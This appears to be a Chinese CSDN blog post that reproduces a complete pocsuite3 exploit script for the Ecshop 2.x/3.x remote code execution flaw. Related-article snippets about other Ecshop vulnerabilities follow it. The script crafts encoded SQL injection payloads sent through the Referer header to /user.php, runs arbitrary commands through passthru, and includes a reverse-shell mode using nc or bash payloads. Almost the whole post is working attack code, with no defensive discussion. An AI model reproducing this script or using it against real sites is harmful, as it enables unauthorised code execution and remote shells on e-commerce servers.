ecshop远程代码执行漏洞poc脚本

于 2023-12-26 07:44:56 发布
阅读量449 收藏 6
点赞数 8
文章标签: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62207482/article/details/135141711
版权

ecsho_rce.py

"""
If you have issues about development, please read:
https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md
for more about information, plz visit https://pocsuite.org
"""

import base64
import binascii
from collections import OrderedDict
from urllib.parse import urljoin

from requests.exceptions import ReadTimeout

from pocsuite3.api import Output, POCBase, POC_CATEGORY, register_poc, requests, REVERSE_PAYLOAD, OptString, OptItems, \
    OptDict, VUL_TYPE
from pocsuite3.lib.utils import get_middle_text


class DemoPOC(POCBase):
    vulID = '97343'  # ssvid
    version = '3.0'
    author = ['seebug']
    vulDate = '2018-06-14'
    createDate = '2018-06-14'
    updateDate = '2018-06-14'
    references = ['https://www.seebug.org/vuldb/ssvid-97343']
    name = 'Ecshop 2.x/3.x Remote Code Execution'
    appPowerLink = ''
    appName = 'ECSHOP'
    appVersion = '2.x,3.x'
    vulType = VUL_TYPE.CODE_EXECUTION
    desc = '''近日,Ecshop爆出全版本SQL注入及任意代码执行漏洞,受影响的版本有:Ecshop 2.x,Ecshop 3.x-3.6.0'''
    samples = []
    install_requires = ['']
    category = POC_CATEGORY.EXPLOITS.WEBAPP
    protocol = POC_CATEGORY.PROTOCOL.HTTP
    pocDesc = '''在攻击模式下,可以通过command参数来指定任意命令,app_version用于选定ecshop版本'''

    def _options(self):
        o = OrderedDict()
        o["command"] = OptString("whoami", description='攻击时自定义命令')
        o["app_version"] = OptItems(['2.x', '3.x', 'Auto'], selected="Auto", description='目标版本,可自动匹配')
        payload = {
            "nc": REVERSE_PAYLOAD.NC,
            "bash": REVERSE_PAYLOAD.BASH,
        }
        o["payload"] = OptDict(default=payload, selected="bash")
        return o

    def gen_ec2payload(self, phpcode):
        # ECShop 2.x payload
        encoded_code = base64.b64encode(phpcode.encode())

        payload = """{$asd'];assert(base64_decode('%s'));//}xxx""" % (
            encoded_code.decode())
        payload = binascii.hexlify(payload.encode()).decode()
        payload = '*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x{},10-- -'.format(payload)
        payload = '''554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:%s:"%s";s:2:"id";s:11:"-1' UNION/*";}554fcae493e564ee0dc75bdf2ebf94ca''' % (
            len(payload), payload)
        return payload

    def gen_ec3payload(self, phpcode):
        # ECShop 3.x payload
        encoded_code = base64.b64encode(phpcode.encode())

        payload = "{$asd'];assert(base64_decode('%s'));//}xxx" % (
            encoded_code.decode())

        payload = binascii.hexlify(payload.encode()).decode()
        payload = '*/ select 1,0x2720756e696f6e202f2a,3,4,5,6,7,8,0x{},10-- -'.format(payload)
        payload = '45ea207d7a2b68c49582d2d22adf953aads|a:2:{{s:3:"num";s:{}:"{}";s:2:"id";s:10:"\' union /*";}}'.format(
            len(payload), payload)
        return payload

    def _verify(self):
        result = {}
        url = urljoin(self.url, '/user.php?act=login')
        phpcode = "phpinfo()"
        flagText = "allow_url_include"

        # ECShop 2.x payload
        ec2payload = self.gen_ec2payload(phpcode)
        # ECShop 3.x payload
        ec3payload = self.gen_ec3payload(phpcode)

        option = self.get_option("app_version")

        if option == "Auto":
            payloads = [(ec2payload, '2.x'), (ec3payload, '3.x')]
        elif option == "2.x":
            payloads = [(ec2payload, '2.x')]
        elif option == '3.x':
            payloads = [(ec3payload, '3.x')]

        for payload, version in payloads:
            headers = {'Referer': payload}
            try:
                rr = requests.get(url, headers=headers)
                if flagText in rr.text:
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = self.url
                    result['VerifyInfo']['Version'] = version
                    break
            except ReadTimeout:
                break
            except Exception as e:
                pass

        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output

    def _attack(self):
        cmd = self.get_option("command")
        result = dict()
        result['Stdout'] = self._exploit(cmd)

        return self.parse_output(result)

    def _shell(self):
        cmd = self.get_option("payload")
        self._exploit(cmd)

    def _exploit(self, cmd='whoami'):
        url = urljoin(self.url, '/user.php?act=login')

        phpcode = 'passthru("{0}");'.format(cmd)

        # ECShop 2.x payload
        ec2payload = self.gen_ec2payload(phpcode)
        # ECShop 3.x payload

        ec3payload = self.gen_ec3payload(phpcode)
        option = self.get_option("app_version")
        if option == "Auto":
            payloads = [(ec2payload, '2.x'), (ec3payload, '3.x')]
        elif option == "2.x":
            payloads = [(ec2payload, '2.x')]
        elif option == '3.x':
            payloads = [(ec3payload, '3.x')]
        # payloads = [ec2payload, ec3payload]

        for payload in payloads:
            headers = {'Referer': payload[0]}
            resp = requests.get(url, headers=headers)
            r = get_middle_text(resp.text, '''<input type="hidden" name="back_act" value="''', "\n<br />")
            if r:
                return r
            r = get_middle_text(resp.text, '''<input type="hidden" name="back_act" value="''', 'xxx')
            if r:
                return r


register_poc(DemoPOC)

 

Lyx-0607
关注
  • 8
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
Ecshop支付宝插件SQL注入及漏洞利用(exp)
Exploit的小站~
05-10 3万+
 0x00 在\includes\modules\payment\alipay.php文件中,有一个response函数用来处理支付信息,在ECSHOP的init初始化文件中,默认是做了全局转义的,而这个漏洞的精髓在于绕过全局转义。 在$order_sn=str_replace($_GET['subject'],'',$_GET['out_trade_no']);中...
ECShop 2.x/3.x SQL注入/远程代码执行漏洞
SwBack的博客
04-09 1379
ecshop 漏洞主要是因为 user.php文件中的display函数的模版变量可控,导致注入,配合注入可达到远程代码执行.不需要登录即可远程写入webshell。
ECShop-v3.0.0漏洞复现
weixin_50866517的博客
08-16 1557
ECShop-v3.0.0漏洞复现配置文件写入导致代码执行二级目录三级目录 配置文件写入导致代码执行 在\ECShop -v3.0.0\install\index.php文件的第207-227行中,使用POST请求接收配置信息的值,并且直接传入到create_config_file方法。 case 'create_config_file' : $db_host = isset($_POST['db_host']) ? trim($_POST['db_host']) : '';
ecshop漏洞修复整理
热门推荐
龚清林的博客
06-01 6万+
1、ECShop存在一个盲注漏洞,问题存在于/api/client/api.php文件中,提交特制的恶意POST请求可进行SQL注入攻击,可获得敏感信息或操作数据库。 路径:/api/client/api.php、/api/client/includes/lib_api.php 参照以下修改: function API_UserLogin($post) { /* SQL注入过滤 ...
ecshop的code.php漏洞,代码审计|ECShop-V3.0.0 漏洞集合
weixin_36461619的博客
04-13 797
0x00 背景不久前对ECShop-V3.0.0进行了一次粗浅的审计,还是发现了一些问题。本篇分析的漏洞利用条件是比较苛刻的,但是重要的是能够在审计的过程中学习到新的思路和知识,期待和师傅们的交流讨论。0x01 漏洞分析配置文件写入导致代码执行0x00 相关环境源码信息:ECShop-V3.0.0-UTF8-release0530问题文件: \ECShop30\install\index.php漏...
ECShop_V2.6.2_UTF8_Release0326.zip
02-04
然而,这个版本存在一些重要的安全问题,特别是关于"ecshop2.2 ecshop2.x代码执行漏洞"的标签所提及的,这是一个对系统安全性构成威胁的重要知识点。 1. **代码执行漏洞**:在ECShop V2.6.2中,存在代码执行漏洞,...
ecshop密码找回PHP执行代码
04-22
为了确保ECShop系统的安全性,开发者应遵循最佳实践,比如使用预处理语句防止SQL注入,使用哈希加盐技术存储用户密码,以及定期更新系统以修复任何已知的安全漏洞。同时,对用户进行安全教育,提醒他们不要使用相同...
ecshop常见漏洞
10-30
ECSHOP的配送地址页面网页没有验证地区参数的有效性,存在sql注入漏洞ecshop的后台编辑文件/admin/affiliate_ck.php中,对输入参数auid未进行正确类型转义,导致整型注入的发生;ecshop的后台编辑文件/admin/...
ecshop_代码结构.docx
02-03
ecshop_代码结构.docx ecshop_代码结构.docx ecshop_代码结构.docx
360提示[严重]Ecshop会员中心XSS漏洞修复.txt
02-02
360提示[严重]Ecshop会员中心XSS漏洞修复.txt 360提示[严重]Ecshop会员中心XSS漏洞修复.txt 360提示[严重]Ecshop会员中心XSS漏洞修复.txt
ecshop初始化漏洞.rar
12-06
ecshop初始化漏洞
ECSHOP漏洞利用
07-21
ECSHOP漏洞利用ECSHOP漏洞利用ECSHOP漏洞利用
ECshop漏洞利用工具
11-11
ECshop漏洞利用工具 专门挖掘ECshop漏洞利用工具的漏洞,所以很好很强大的哦
ECShop全系列版本远程代码执行高危漏洞分析+实战提权
xiaoi123的博客
09-20 1913
漏洞概述   ECShop的user.php文件中的display函数的模版变量可控,导致注入,配合注入可达到远程代码执行。攻击者无需登录站点等操作,可以直接远程写入webshell,危害严重。 漏洞评级   严重 影响范围   ECShop全系列版本,包括2.x,3.0.x,3.6.x等。 漏洞分析 0x01. SQL注入   先看 ecshop/user.php:302 ...
《WEB安全渗透测试》(16)利用Python编写漏洞批量检测POC
午夜安全
10-31 2484
《WEB安全渗透测试》(16)利用Python编写漏洞批量检测POC ECShop的user.php文件中的display函数的模板变量可控,导致注入,配合注入可达到远程代码执行。攻击者无需登录等操作,可直接远程把webshell写入服务器。$back_act变量来源于HTTP_REFERER,我们可以控制它。Ecshop使用了 php 模版引擎 smarty ,该引擎有两个基本的函数assign()、display()。...
ecshop 2.x/3.x sql注入/任意代码执行漏洞
whatday的专栏
07-01 2056
影响版本: Ecshop 2.x Ecshop 3.x-3.6.0 漏洞分析: 该漏洞影响ECShop 2.x和3.x版本,是一个典型的“二次漏洞”,通过user.php文件中display()函数的模板变量可控,从而造成SQL注入漏洞,而后又通过SQL注入漏洞将恶意代码注入到危险函数eval中,从而实现了任意代码执行。 值得一提的是攻击者利用的payload只适用于ECShop 2.x版本导致有部分安全分析者认为该漏洞不影响ECShop 3.x,这个是因为在3.x的版本里有引入防注...
SQL注入漏洞原理详解以及常见框架的SQL注入防止
日拱一卒无有尽,功不唐捐终入海
03-06 6478
SQL注入漏洞是指由于应用程序未能正确过滤用户提交的数据,在用户提交包含SQL语句的内容时,会被应用程序接收并在数据库上执行,从而达到非法操作数据库的目的。这种攻击手段被称为SQL注入攻击。
ecshop漏洞user.php,ECShop 2.x 3.0代码执行漏洞分析
weixin_31240035的博客
03-23 684
*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。0x00 前言ECShop是一款B2C独立网店系统,适合企业及个人快速构建个性化网上商店。2.x版本跟3.0版本存在代码执行漏洞。0x01 漏洞原理ECShop 没有对 $GLOBAL[‘_SERVER’][‘HTTP_REFERER’] 变量进行验证,导致用户可以将任意代码插入的u...
ecshop前台漏洞
最新发布
09-02
ECShop前台漏洞是指在ECShop电商系统的前台界面中存在的安全漏洞。根据引用的资料,ECShop的前台漏洞链主要是基于ECShop过去的漏洞,并以insert_mod为主要入口点。具体来说,在ECShop 4.0.7版本中,漏洞入口点位于...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Lyx-0607

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值